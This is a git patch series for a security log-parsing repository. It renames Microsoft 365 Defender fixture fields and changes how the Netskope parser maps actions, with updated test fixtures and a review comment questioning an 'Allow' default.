+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index 55684497d..f33a1eb87 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, 
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 5a6e54961..3cedbfdb3 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json 
@@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 9304ca1cb..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -22,14 +22,10 @@ "@timestamp": "2024-09-24T14:18:11.864114Z", "action": { "properties": { - "LogonId": "0", - "process": { - "parent": { - "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", - "FileSize": 11864, - "LogonId": "0" - } - } + "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "InitiatingProcessFileSize": 11864, + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, From c1d52ac1ccb3dd44390361ce5806be9a8d31570c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 09:40:42 +0100 Subject: [PATCH 098/150] Update Netskope/netskope_events/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Netskope/netskope_events/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 7ce3a2543..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,8 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" + event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" From bbb2d8c5d99a2b154a4a8aeb127d12968cbc8b97 Mon Sep 17 00:00:00 2001 
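Review bot: The added `action.name: "{{parsed_event.message.action or 'Allow'}}"` line synthesizes an allow verdict whenever the Netskope record carries no `action` field, which is the normal case for admin-audit and connection events; the follow-up "Fixing tests" commit consequently expects `action.name: "Allow"` even for the "Login Failed" audit fixture, and any detection keyed on `action.name` would read that as a permitted event. The same commit shows that an empty rendered template is dropped rather than emitted (the audit fixtures lose `event.action` once the old `or 'Allow'` fallback is removed), so the honest form is the same here: `action.name: "{{parsed_event.message.action}}"`, leaving the field absent when the source does not state one. If a default is really required, it should be documented next to the line with a comment such as `# Netskope omits 'action' on audit and connection logs; no verdict is implied`, so the fixtures are not mistaken for vendor semantics. The enclosing `stages` mapping starts and ends outside the hunk.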
From: LenaigKaliou Date: Thu, 28 Nov 2024 09:46:49 +0100 Subject: [PATCH 099/150] Fixing tests --- .../tests/test_audit_log_deleted_inline_policy.json | 4 +++- .../tests/test_audit_log_edit_admin_record.json | 4 +++- .../netskope_events/tests/test_audit_log_login_failed.json | 4 +++- .../tests/test_audit_log_login_successful.json | 4 +++- .../tests/test_audit_log_logout_successful.json | 4 +++- .../tests/test_audit_log_password_change_successful.json | 4 +++- Netskope/netskope_events/tests/test_connection_log.json | 4 +++- Netskope/netskope_events/tests/test_dlp_incident.json | 3 +++ Netskope/netskope_events/tests/test_malware_alert.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_block.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_log.json | 3 +++ Netskope/netskope_events/tests/test_nspolicy_upload.json | 3 +++ Netskope/netskope_events/tests/test_user_alert.json | 5 ++++- 13 files changed, 42 insertions(+), 10 deletions(-) diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index df70ea26e..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], 
@@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 10b406a5f..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a792a408..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 01549d366..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { 
diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 12e39be95..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index a2fa885de..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "iam" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 5c5218356..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n 
\"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "network" ], @@ -20,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 37ab6e32b..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 5e5f6de15..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n 
\"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": 
\"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Detection", + "action": "Download", "category": [ "malware" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json index 0d739d4fd..404b5d4ab 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_block.json +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
@@ -11,7 +11,7 @@ "expected": { "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
